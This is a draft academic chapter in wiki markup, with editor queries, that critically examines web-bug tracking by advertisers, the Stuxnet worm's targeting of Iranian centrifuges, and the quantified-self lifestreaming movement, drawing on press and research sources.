Originally designed as ‘HTTP state management mechanisms’ in the early 1990s, these data storage processes were designed to enable webpages and sites to store the current collection of data about a user, or what is called ‘State’ in computer science. Known as ‘web bugs for web 1.0’ (Dobias, 2010: 245), they were aimed at allowing website designers to implement some element of memory about a user, such as a current shopping basket, preferences, or username. It was a small step for companies to see the potential of monitoring user behaviour by leaving tracking information about browsing, purchasing and clicking behaviour through the use of these early ‘cookies’.[2] The ability of algorithms to track behaviour, and collect data and information about users raises important privacy implications, but it also facilitates the rise of so-called behaviour marketing and nudges (for a behaviourist approach see Eyal, 2012). These technologies have become much more sophisticated in the light of Web 2.0 technologies and developments in hardware and software: in effect, web bugs for web 2.0 (Dobias, 2010: 245). &lt;br /&gt;
&lt;br /&gt;
Fortunately, we are seeing the creation of a number of useful software projects to allow us to track the trackers: Collusion, Foxtracks and Ghostery, for example.[3] If we look at the Ghostery log for the [http://chartbeat.com/ ChartBeat company] it is described as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Provid[ing] real-time analytics to web sites and blogs. The interface tracks visitors, load times, and referring sites on a minute-by-minute basis. This allows real-time engagement with users giving publishers an opportunity to respond to social media events as they happen. ChartBeat also supports mobile technology through APIs. (Ghostery, 2012b)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Web bugs perform these analytics by running code run in the browser without the knowledge of the user, which if it should be observed, looks extremely complicated.[4] Here are two early web bugs (web 1.0) collected by the Electronic Frontier Foundation (EFF) (1999): &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;&lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;img src=&amp;quot;(http://ad.doubleclick.net/ad/pixel.quicken/NEW)&amp;quot; width=1 height=1 border=0&amp;amp;gt;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;IMG WIDTH=1 HEIGHT=1 border=0 SRC=&amp;quot;(http://media.preferences.com/ping?&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;ML_SD=IntuitTE_Intuit_1x1_RunOfSite_Any) &amp;amp;amp;db_afcr=4B31-C2FB-10E2C&amp;amp;amp;event=reghome&amp;amp;amp;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;group=register&amp;amp;amp; time=1999.10.27.20.5 6.37&amp;quot;&amp;amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Later web bugs (web 2.0) are not included here due to the complexity and length of the code (but see the 3rd-party elements, or ‘3pes’, at http://www.knowyourelements.com/ ).[5] It is noticeable that this code is extremely opaque and difficult to understand, even for experienced computer programmers. Indeed, one suspects an element of obfuscation, a programming technique to reduce the readability of the code in order to shield the company from observation. So far, in checking a number of web bugs on a variety of websites, I have been unable to find one that supplies any commentary on what exactly the code is doing, beyond a short privacy policy statement. Again Ghostery (2012b) usefully supplies us with some general information on the web bug, such as the fact that it has been found on over 100,000 websites across the Internet, and that the data collected is 'anonymous (browser type), pseudonymous (IP address)', the data is not shared with third parties but no information is given on their data retention policies. As of 2nd March, 2012, Ghostery reported that it was tracking 829 different web bugs across the Internet. This is a relatively unregulated market in user behavior, tracking and data collection, which currently has a number of self-regulatory bodies, such as the Network Advertising Initative (NAI). As Madrigal reports: 'In essence, [the NAI] argued that users do not have the right to *not* be tracked. &amp;quot;We've long recognized that consumers should be provided a choice about whether data about their likely interests can be used to make their ads more relevant,&amp;quot; [they] wrote. &amp;quot;But the NAI code also recognizes that companies sometimes need to continue to collect data for operational reasons that are separate from ad targeting based on a user's online behavior.&amp;quot;… Companies &amp;quot;need to continue to collect data,&amp;quot; but that contrasts directly with users desire &amp;quot;not to be tracked.&amp;quot;' (Madrigal, 2012). [Eds: please check that the single and double quotation marks here are correct]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; These web bugs, beacons, pixels, and tags, as they are variously called, form part of the dark-net surveillance network that users rarely see, even though it is profoundly changing their experience of the internet in real-time by attempting to second guess, tempt, direct and nudge behavior in particular directions. Ghostery ranked the web bugs in 2010 and identified the following as the most frequently encountered (above average): Revenue Science (250x), OpenX (254x), AddThis (523.6x), Facebook Connect (529.8x), Omniture (605.7x), Comscore Beacon (659.5x), DoubleClick (924.4x), QuantCast (1042x), Google Adsense (1452x), Google Analytics (3904.5x) (Ghostery, 2011). As can be seen in terms of relative size of encounter, Google is clearly the biggest player by a long distance in the area of user statistics collection. This data is important because, as JP Morgan's Imran Khan explained, a unique visitor to each website at [http://www.businessinsider.com/blackboard/amazon Amazon] (e-commerce) is generating $189 per user, at [http://www.businessinsider.com/blackboard/google Google] (search) it is generating $24 per user, and although Facebook (social networking) is only generating $4 per user, this is a rapidly growing number (Yarrow, 2011).&amp;amp;nbsp; Keeping and holding these visitors, through real-time analytics, customer history, behavioural targeting, etc. is increasingly becomong extremely profitable. Ghostery (2010) has performed a useful analysis of their web bug database that attempts to categorise the web bugs found into 16 different types, which I have re-categorised into five main types: (1) Advertiser/Marketing Services, (2) Analysis/Research Services, (3) Management Platforms, (4) Verification/Privacy Services: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
1. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Advertiser/Marketing Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Advertiser: A company sponsoring advertisement and ultimately responsible for the message delivered to the consumer. Example: [http://www.att.com/ AT&amp;amp;amp;T] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Exchange: A provider of marketplace connecting advertisers to ad networks and data aggregators (online and off), often facilitating multiple connections and bidding processes. Example: [http://www.rightmedia.com/ Right Media]&amp;amp;nbsp; &amp;amp;nbsp; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Network: A broker and often technology provider connecting advertisers and publishers. (web site operators) Example: [http://www.burstmedia.com/ Burst Media]&amp;lt;br&amp;gt; &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Publisher: Website operator who displays ads for advertiser(s) in various types of campaigns. Example: [http://www.nytimes.com/ The New York Times]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
2. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Analysis/Research Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Data Aggregator: Collects data from online publishers and provides it to advertisers either directly or via exchange. Example: [http://www.bluekai.com/ BlueKai] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Offline Data Aggregator: Collects data from a range of offline sources and provides data to advertisers directly or via exchange. [http://www.experian.com/ Experian] &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Optimizer: Provider of analytics technology and services for ROI assessment and content optimization purposes. Example: [http://www.roilabs.com/ ROILabs] &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Research: Collects data for market research purposes where no ads are serviced through this data. Example: Example: [http://www.safecount.net/ Safecount] &lt;br /&gt;
*e.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Analytics Provider: Provider of cross-platform statistical analysis to understand market effectiveness and audience segmentation. Example: [http://www.google.com/analytics/ Google Analytics] &lt;br /&gt;
*f.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Retargeter: Providers of technologies that allow publishers to identify their visitor when they place ads on third party sites. Example: [http://www.fetchback.com/ Fetchback]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
3. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Management Platforms''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Demand-Side Platform: A technology provider that allows marketers to buy inventory across multiple platforms or exchanges. DSPs often layer in custom optimization, audience targeting, real-time bidding and other services. Example: [http://www.invitemedia.com/ Invite Media]&amp;lt;br&amp;gt; &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Supply-Side Platform: A technology provider that allows publishers to access advertiser demand across multiple platforms or exchanges.&amp;amp;nbsp; SSPs often layer in custom yield optimization, audience creation, real-time bidding and other services. Example: [http://www.admeld.com/ AdMeld]&amp;lt;br&amp;gt; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Server: Technology that delivers and tracks advertisements independently of the web site where the ad is being displayed. Example: [http://www.doubleclick.com/ DoubleClick DART]&amp;lt;br&amp;gt; &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Agency: Provider of creative and buying services (both audience and data) for advertisers. Example: [http://www.mediacom.com/en/home.aspx MediaCom]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
4. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Verification/Privacy Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Verification: Certifies or classifies webpages in an effort to prevent advertisers’ campaigns from running on unsavory or blocked content, and/or protects advertisers from having other companies run their ads incorrectly. &amp;amp;nbsp;Example: [http://www.clickforensics.com/ ClickForensics] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Privacy: Technology providers that deliver information and transparency to consumers on how 3rd party companies gather and use their data. Example: [http://www.betteradvertising.com/ Better Advertising]&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:LUMAadvertising.jpg|left|500x450px|Image 1: Display Advertising Technology Landscape (Luma, 2010)]] &amp;lt;br&amp;gt; ''Image 1: Display Advertising Technology Landscape (Luma, 2010)''&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &amp;lt;br&amp;gt; Ghostery gives a useful explanation of how these companies interoperate to perform a variety of services for advertising and marketing clients: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;A company like [http://www.turn.com/ Turn Media] is a technology provider that allows marketers to buy inventory across multiple platforms or exchanges, or a Demand-Side Platform. They provide services for marketers and agencies to centrally manage buying, planning, targeting, and optimizing media opportunities. Reasonably speaking, however, you could also technically classify them as an Optimizer because this process is included under the umbrella of the platform. Turn [Media] is deeply data driven and partners with multiple data providers including [http://www.bluekai.com/ BlueKai], [http://www.targusinfo.com/ TargusInfo], [http://www.exelate.com/new/index.html eXelate], and others (Ghostery, 2010). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Of course, one element missing from this typology is that of surveillance, and indeed it is no surprise that web bugs perform part of the tracking technologies used by companies to monitor staff. For example, in 2006 Hewlett Packard used web bugs from [http://readnotify.com/ readnotify.com] to trace insider leaks to the journalist Dawn Kawamoto and later confirmed in testimony to a U.S. House of Representatives subcommittee that it's ‘still company practice to use e-mail bugs in certain cases’ (Evers, 2006; Fried, 2006). &lt;br /&gt;
&lt;br /&gt;
As can be seen, this is an extremely textured environment that currently offers little in terms of diagnosis or even warnings to the user. The industry itself, which prefers the term “clear GIF” to web bug, is certainly keen to avoid regulation and keeps itself very much to itself in order to avoid raising too much unwarranted attention. Some of the current discussions over the direction of regulation on this issue have focused on the “do not track” flag, which would signal a user's opt-out preference within an HTTP header. Unfortunately, very few companies respect the &amp;quot;do not track&amp;quot; header and there is currently no legal requirement that they do so in the US, or elsewhere (W3C, 2012). Although one can see in this context the current debate over the EU ePrivacy Directive, where the Article 29 Working Party (A29 WP) has stated that ‘voluntary plans drawn up by Europe's digital advertising industry representatives, the European Advertising Standards Alliance (EASA) and IAB Europe, do not meet the consent and information requirements of the recently revised ePrivacy Directive’ (Baker, 2012). [Eds: would this final point be better in a footnote?]&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
One of the newer, and perhaps indicative directions of travel of these new web bugs under development is called [http://www.persianstat.ir/ PersianStat], which claims to keep 'an eye on 1091622 websites': an Iranian web tracking and data analytics website it shows that this new code ecology is not purely a Western phenomenon. With the greater use of computational networked devices in everyday life, from mobile phones to GPS systems, these forms of tracking systems will only become more invasive and aggressive in collecting data from our everyday life and encounters. Indeed, it is unsurprising to find that Americans, for example, are not comfortable with the growth in use of these tracker technologies. Pew (2012) found: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;that 73 percent of&amp;amp;nbsp;Americans said they would 'not be okay' with&amp;amp;nbsp;being tracked (because it would be an invasion&amp;amp;nbsp;of privacy)… Only 23 percent said they'd be 'okay' with&amp;amp;nbsp;tracking (because it would lead to better and&amp;amp;nbsp;more personalized search results)…Despite all those high-percentage objections&amp;amp;nbsp;to the idea of being tracked, less than half of&amp;amp;nbsp;the people surveyed -- 38 percent -- said they&amp;amp;nbsp;knew of ways to control the data collected&amp;amp;nbsp;about them. (Garber, 2012; Pew, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This contradiction between the ability of these computational systems and surfaces to supply a commodity to the user, and the need to raise income through the harvesting of data which is in turn sold to advertisers and marketing companies, shows that this is an unstable situation. It also serves to demonstrate the extent&amp;amp;nbsp;to which users are just not aware of the subterranean depths of their computational devices and the ability&amp;amp;nbsp;of these general computing platforms to disconnect the user interface from the actual intentions or functioning of the device, whilst giving the impression to the user that they remain fully in control of the computer. As Garber observes, ‘underground network, surface illusion… How much do we actually want to know about this stuff? Do we truly want to understand the intricacies of data-collection and personalization and all the behind-the-screen work that creates the easy, breezy experience of search ... or would we, on some level, prefer that it remain as magic?’ (Garber, 2012). An issue helpfully illustrated by the next case study of the Stuxnet virus, which shows the extent to which the magic of software can conceal its true function. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Stuxnet'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Stuxnet[6] is a computer worm which experts now believe was aimed at the Iranian uranium-enrichment facility at Natanz, Iran.[7] The Stuxnet worm, a subclass of computer virus, copied itself repeatedly across computer systems until it found the host that met its ‘strike conditions’, that is, the location it was designed to attack, and activated its ‘digital warhead’, which may monitor, damage, or even destroy its target. The name, ‘Stuxnet,’ is ‘derived from some of the filename/strings in the malware - mrxcls.sys, mrxnet.sys’, the first part, 'stu', comes from the (.stub) file, mrxcls.sys; the second part, 'xnet', comes from mrxnet.sys (Kruszelnicki, 2011; mmpc2, 2010). Due to the sophistication of the programming involved, this worm is considered to have reached a new level in cyberwarfare. Stuxnet has been called the first 'weaponized' computer virus, and it would have required huge resources, like a test facility to model a nuclear plant, to create and launch it (Cherry, 2010). As Liam O Murchu, an operations manager for Symantec, explained: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Unlike the millions of worms and viruses that turn up on the Internet every year, this one was not trying to steal passwords, identities or money. Stuxnet appeared to be crawling around the world, computer by computer, looking for some sort of industrial operation that was using a specific piece of equipment, a Siemens S7-300 programmable logic controller. (60 Minutes, 2012b).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;The Stuxnet worm works by undertaking a very complex stealth infection and covers its tracks by recording data from the nuclear processing system which it then plays back to the operators to disguise that it is actually gently causing the centifuges to fail. This is known as a ‘man-in-the-middle attack’ because it fakes industrial process control sensor signals so an infected system does not exhibit abnormal behavior and therefore raise alarm. Again, cleverly, the faults it creates in the plant are likely to occur weeks after the sabotaged effort, and in a targeted way, through the fatiguing of the motors – this looks like a standard failure rather than an attack. Indeed, Iran later confirmed that a number of its centrifuges had been affected by an attack (CBS News, 2010).&amp;amp;nbsp;A ‘senior Iranian intelligence official said an estimated 16,000 computers were infected by the Stuxnet virus’ (Assocated Press, 2012). The Stuxnet worm is also interesting because it has built-in ''sunset code'' that causes the worm to erase itself after 24 June, 2012, and hence hide its tracks. As Zetter explains: &lt;br /&gt;
&amp;lt;blockquote&amp;gt;once the code infects a system, it searches for the presence of two kinds of frequency converters made by the Iranian firm Fararo Paya and the Finnish company Vacon, making it clear that the code has a precise target in its sights… Stuxnet begins with a nominal frequency of 1,064 Hz… then reduces the frequency for a short while before returning it back to 1,064 Hz… Stuxnet [then] instructs the speed to increase to 1,410 Hz, which is 'very close to the maximum speed the spinning aluminum IR-1 rotor can withstand mechanically',… [but] before the rotor reaches the tangential speed at which it would break apart… within 15 minutes after instructing the frequency to increase, Stuxnet returns the frequency to its nominal 1,064 Hz level. Nothing else happens for 27 days, at which point a second attack sequence kicks in that reduces the frequency to 2 Hz, which lasts for 50 minutes before the frequency is restored to 1,064 Hz. Another 27 days pass, and the first attack sequence launches again, increasing the frequency to 1,410 Hz, followed 27 days later by a reduction to 2 Hz. (Zetter, 2011)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Stuxnet disguises all of this activity by overriding the data control systems and sending commands to disable warning and safety controls that would normally alert plant operators to these dangerous frequency changes. Stuxnet is intriguing because it is not a general purpose attack, but designed to unload its digital warheads under specific conditions against a specific threat target. It is also remarkable in the way in which it disengages the interface, the screen for the user, from the underlying logic and performance of the machine. &lt;br /&gt;
&lt;br /&gt;
Indeed, there has been a great deal of speculation about whether a state would have been required to develop it due to the complexities involved in being able to test such a worm before releasing it into the wild (Markoff and Sanger, 2010). Richard Clarke, the former chief of counter-terrorism under Presidents Clinton and Bush, argues that the built-in fail-safes are an important clue to Stuxnet’s source and that they point to the kinds of procedures found in a Western government. He says, ‘If a [Western] government were going to do something like this…then it would have to go through a bureaucracy, a clearance process, [and] somewhere along the line, lawyers would say, “We have to prevent collateral damage,” and the programmers would go back and add features that normally you don’t see in the hacks. And there are several of them in Stuxnet’ (Gross, 2011). Indeed, the complexities and structure of the worm are such that at least thirty people would have been working on it simultaneously in order to build a worm of this kind (Zetter, 2010). This is especially true of a worm that launched a so-called ‘zero-day attack’, that is, using a set of techniques that are not public nor known by the developer of the attacked system, in this case Microsoft and Siemens. In actuality it was remarkable for exploiting four different zero-day vulnerabilities (Gross, 2011). Because of the layered approach to its attack and the detailed knowledge required of Microsoft Windows, SCADA (Supervisory Control And Data Acquisition) and PLCs (Programmable Logic Controllers) systems, this would have been a very large project to develop and launch. Indeed, Eric Byres, chief technology officer for Byres Security, has stated: ‘we’re talking man-months, if not years, of coding to make it work the way it did' (quoted in Zetter, 2010). &lt;br /&gt;
&lt;br /&gt;
The two chief capabilities of Stuxnet are: (1) to identify its target precisely using a number of software based markers that give the physical identity of the location away. Indeed, ‘attackers [had] full, and I mean this literally, full tactical knowledge of every damn detail of [the Natanz] plant’ (60 Minutes, 2012b); and (2) the capability to disengage control systems from physical systems and to provide a stealth infection into the computer system that would fool the operators of the plant (also known as a ‘man-in-the-middle attack’). This was achieved through the use of two ‘digital warheads’, called 417 and 315. The smaller, 315, was designed to slowly reduce the speed of rotors leading to cracks and failures, and the second larger warhead, 417, manipulated valves in the centrifuge and faking industrial process control sensor signals by modeling the centifuges which were grouped into 164 cascades (Langner, 2011). Indeed, Langner (2011) described this evocatively as ‘two shooters from different angles’. The Stuxnet worm was launched some time in 2009/2010 and shortly afterwards:[8] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;the all-important centrifuges at Iran's nuclear fuel enrichment facility at Natanz began failing at a suspicious rate. Iran eventually admitted that computer code created problems for their centrifuges, but downplayed any lasting damage. Computer security experts now agree that code was a sophisticated computer worm dubbed Stuxnet, and that it destroyed more than 1,000 centrifuges. (60 Minutes, 2012a)&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; The name Stuxnet origin is hypothesized from an analysis of the approximately 15,000 lines of programming code. This was a close reading and reconstruction of the programming logic by taking the machine code, disassembling it and then attempting to convert it into the C programming language. The code could then be analysed for system function calls, timers, and data structures, in order to try to understand what the code was doing (Langner, 2011). Indeed, as part of this process a reference to “Myrtus” was discovered, and the link made to 'Myrtus as an allusion to the Hebrew word for Esther. The Book of Esther tells the story of a Persian plot against the Jews, who attacked their enemies pre-emptively' (Markoff and Sanger, 2010).[9] Whilst no actor has claimed responsibility for Stuxnet, there is a strong suspicion that either the United States or Israel had to be involved in the creation of such a sophisticated attack virus. Its attack appears to have been concentrated on a number of selected areas, with Iran at the centre (see table 1).&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:BerryStuxnet.jpg|left|500x450px|Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.)]] &lt;br /&gt;
&lt;br /&gt;
**Iran -&amp;amp;nbsp;52.2% &lt;br /&gt;
**Indonesia -&amp;amp;nbsp;17.4% &lt;br /&gt;
**India -&amp;amp;nbsp;11.3% &lt;br /&gt;
**Pakistan -&amp;amp;nbsp;3.6% &lt;br /&gt;
**Uzbekistan-&amp;amp;nbsp;2.6% &lt;br /&gt;
**Russia -&amp;amp;nbsp;2.1% &lt;br /&gt;
**Kazakhstan -&amp;amp;nbsp;1.3% &lt;br /&gt;
**Rest of World -&amp;amp;nbsp;9.4%&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
''Table 1: Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.).'' &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;Clearly, this kind of attack could be mobilized at targets other than nuclear enrichment facilities, and indeed the stealth and care with which it attempts to fool the operators of the plants shows that computational devices will undoubtedly be targets for monitoring, surveillance, control and so forth in the future. But of course, once the code for undertaking this kind of sophisticated cyberattack is out in the wild it is relatively trivial to decode the computer code and learn techniques that would have taken many years of development in a very short time. As Sean McGurk explains, ‘you can download the actual source code of Stuxnet now and you can repurpose it and repackage it and then, you know, point it back towards wherever it came from’ (60 Minutes, 2012b). Indeed, a different worm, called Duqu, has already been discovered, albeit with purposes linked to the collection of the data on industrial control systems and structures, a so-called ‘Trojan’ (Hopkins, 2011).[10] As Alexander Gostev reports, &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;There were a number of projects involving programs based on the “Tilded” [i.e. Stuxnet] platform throughout the period 2007-2011. Stuxnet and Duqu are two of them – there could have been others, which for now remain unknown. The platform continues to develop, which can only mean one thing – we’re likely to see more modifications in the future. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; The increased ability of software and code via computational devices to covertly monitor, control and mediate, both positively and negatively, is not just a case of interventions for deceiving the human and non-human actors that make up part of these assemblages. In the next section I want to look at the willing compliance with data collection, indeed the enthusiastic contribution of real-time data to computational systems as part of the notion of lifestreams, and more particularly the quantified self movement. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Lifestreams'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Lastly, I want to turn to connect these developments in web-bugs and worms with the growth in the use of self-monitoring technologies called lifestreaming, or the notion of the quantified self.[11] These have expanded in recent years as the ‘real-time streams’ platforms have expanded, like Twitter and Facebook. Indeed, some argue that ‘we’re finally in a position where people volunteer information about their specific activities, often their location, who they’re&amp;amp;nbsp;with, what they’re doing, how they feel about what they’re doing, what they’re talking about…We’ve never had data like that before, at least not at that level of granularity’ (Rieland, 2012). This has been usefully described by the ''Economist'', who argue that the, &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;idea of measuring things to chart progress towards a goal is commonplace in large organisations. Governments tot up trade figures, hospital waiting times and exam results; companies measure their turnover, profits and inventory. But the use of metrics by individuals is rather less widespread, with the notable exceptions of people who are trying to lose weight or improve their fitness…But some people are doing just these things. They are an eclectic mix of early adopters, fitness freaks, technology evangelists, personal-development junkies, hackers and patients suffering from a wide variety of health problems. What they share is a belief that gathering and analysing data about their everyday activities can help them improve their lives—an approach known as “self-tracking”, “body hacking” or “self-quantifying”. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This phenomena of using computational devices to monitor health signals and to feed them back into calculative interfaces, data visualisations, real-time streams, etc. is the next step in social media. This closes the loop of personal information online, which, although it remains notionally private, is stored and accessed by corporations who wish to use this biodata for data mining and innovation surfacing. For example: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;The Zeo [headband], for example, has already generated the largest-ever database on sleep stages, which revealed differences between men and women in REM-sleep quantity. Asthmapolis also hopes to pool data from thousands of inhalers fitted with its Spiroscout [asthma inhaler] sensor in an effort to improve the management of asthma. And data from the Boozerlyzer [alcohol counting] app is anonymised and aggregated to investigate the variation in people’s response to alcohol. (Economist, 2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Lifestreams were originally an idea from David Gelernter and Eric Freeman in the 1990s (Freeman, 1997; Gelernter, 2010), which they described as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;a time-ordered stream of documents that functions as a diary of your electronic life; every document you create and every document other people send you is stored in your lifestream. The tail of your stream contains documents from the past (starting with your electronic birth certificate). Moving away from the tail and toward the present, your stream contains more recent documents --- papers in progress or new electronic mail; other documents (pictures, correspondence, bills, movies, voice mail, software) are stored in between. Moving beyond the present and into the future, the stream contains documents you ''will'' need: reminders, calendar items, to-do lists. You manage your lifestream through a small number of powerful operators that allow you to transparently store information, organize information on demand, filter and monitor incoming information, create reminders and calendar items in an integrated fashion, and &amp;quot;compress&amp;quot; large numbers of documents into overviews or executive summaries. (Freeman, 2000)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Gelernter originally described these ‘chronicle streams’ (Gelernter, 1994), highlighting both their narrative and temporal dimensions related to the storage of documentation and texts. Today we are more likely to think of them as ‘real-time streams’ and the timeline functions offered by systems like Twitter, Facebook and Google+. These are increasingly the model of interface design that is driving the innovation in computation, especially in mobile and locative technologies. However, in contrast to the document-centric model that Gelernter and Freeman were describing, there are also the micro-streams of short updates, epitomized by Twitter, which has short text-message sized 140 character updates. Nonetheless this is still enough text space to incorporate a surprising amount of data, particularly when geo, image, weblinks, and so forth are factored in. Stephen Wolfram was one of the first people to collect their data systematically.&amp;amp;nbsp;As he explains, Wolfram started in 1989: 'So email is one kind of data I’ve systematically archived. And there’s a huge amount that can be learned from that.&amp;amp;nbsp;Another kind of data that I’ve been collecting is keystrokes. For many years, I’ve captured every keystroke I’ve typed—now more than 100 million of them' (Wolfram, 2012). &amp;amp;nbsp; 